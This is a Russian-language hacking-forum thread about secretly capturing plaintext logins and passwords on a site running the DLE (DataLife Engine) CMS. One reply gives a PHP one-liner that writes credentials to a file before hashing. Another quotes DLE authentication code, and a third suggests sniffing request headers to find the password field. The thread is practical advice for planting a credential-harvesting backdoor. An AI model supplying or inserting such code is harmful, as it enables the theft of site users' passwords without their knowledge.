Сниффер в движок DLE

Discussion in 'Уязвимости' started by Edward007, 11 Apr 2016.

  1. Edward007

    Edward007 New Member

    Joined:
    24 Dec 2015
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    В общем, суть вопроса такая:
    Вот сайт с описанием данной штуки: http://krober.biz/?p=1239
    Перед тем как читать дальше, клацните на ссылку выше.
    Как сделать так, чтобы при любой авторизации записывался в файл логин и пароль? (Без MD5, то есть чистый пароль)
    С этим кодом, получается подобная штука:
    [​IMG]
    Я точно не знаю, эти цифры 200: из-за чего они, и должно ли быть так.
     
  2. Logan22

    Logan22 Member

    Joined:
    11 Sep 2009
    Messages:
    114
    Likes Received:
    17
    Reputations:
    0
    В CMS ищешь файл где происходит авторизация пользователя или админа и записываешь данные до хэширования пароль.
    типо так file_put_contents('logpass.txt', $login.':'.$password);
    Всё.
     
  3. Edward007

    Edward007 New Member

    Joined:
    24 Dec 2015
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Тк я искал тот самый файл, и чёт не нашел...
     
  4. blackbox

    blackbox Elder - Старейшина

    Joined:
    31 Dec 2011
    Messages:
    364
    Likes Received:
    62
    Reputations:
    11
    C наскоку не получится, тут нужно хотя бы основы php знать и примерно понимать как устроен движок, чтобы в правильном месте код модифицировать чтобы он сохранял. Так что выводы напрашиваются сами.
     
  5. LETIFERUM

    LETIFERUM New Member

    Joined:
    3 Apr 2016
    Messages:
    43
    Likes Received:
    0
    Reputations:
    0
    200 это результат запроса скорее всего,не?тоже самое как возвращается 404 итд итп

    PHP:
        ///////Конец нашей вставки//////////
        
    $is_loged_in true;
        
    $dle_login_hash md5(SECURE_AUTH_KEY $_SERVER['HTTP_HOST'] . $member_id['user_id'] . sha1($cmd5_password) . $config['key'] . date("Ymd"));
        if (!
    $_SESSION['dle_user_id'] and $_COOKIE['dle_user_id']) {
            
    session_regenerate_id();
            
    $_SESSION['dle_user_id'] = $_COOKIE['dle_user_id'];
            
    $_SESSION['dle_password'] = $_COOKIE['dle_password'];
        }
    нафиг эта часть кода тебе?или я не прав?
     
  6. Edward007

    Edward007 New Member

    Joined:
    24 Dec 2015
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Основы пыха я и так знаю... Попробую поискать ещё раз.
     
    blackbox likes this.
  7. ol1ver

    ol1ver Active Member

    Joined:
    22 Jul 2011
    Messages:
    241
    Likes Received:
    152
    Reputations:
    0
    Используй снифер заголовков. Как минимум можно узнать название post переменному сделать её поиск по исходникам, дальше плясать
     
Loading...